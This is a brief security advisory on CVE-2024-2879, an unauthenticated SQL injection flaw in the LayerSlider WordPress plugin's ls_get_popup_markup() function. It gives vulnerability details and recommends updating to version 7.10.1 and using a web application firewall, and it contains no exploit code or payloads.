A critical vulnerability has been discovered in the widely used LayerSlider WordPress plugin, posing a significant risk of data theft for over a million websites. Identified as CVE-2024-2879, this SQL injection flaw allows attackers to bypass security measures and access sensitive data from WordPress databases without authentication.
Vulnerability Details:
- CVE ID: CVE-2024-2879
- CVSS Score: 9.8 (Critical)
- Affected Software: LayerSlider WordPress plugin
- Vulnerability Type: SQL Injection
- Impact: Data theft, including user credentials and customer information
Incident Overview:
Security researcher Amr Awad, during Wordfence’s Bug Bounty Extravaganza, discovered that the LayerSlider plugin’s ls_get_popup_markup() function improperly sanitized input, specifically the ‘id’ parameter. This flaw enables attackers to perform a time-based blind SQL injection, a sophisticated method that quietly extracts data from the database.
Affected Population:
The LayerSlider plugin, with over a million active installations, is extensively used across WordPress sites, including commercial platforms that handle customer data. The flaw affects those on versions prior to the recently patched 7.10.1.
Mitigation Recommendations:
- Immediate Update: Users should upgrade to LayerSlider version 7.10.1 or later, which contains fixes for the vulnerability.
- Regular Maintenance: Keep all components of WordPress sites, including core software, plugins, and themes, up to date.
- Enhance Security Posture: Implement a Web Application Firewall (WAF) to detect and prevent SQL injection and other web-based attacks.
Conclusion:
The discovery of CVE-2024-2879 underscores the critical importance of maintaining up-to-date software to safeguard against potential data breaches. WordPress site administrators are advised to act promptly to update the affected plugin and review security practices to protect sensitive information.
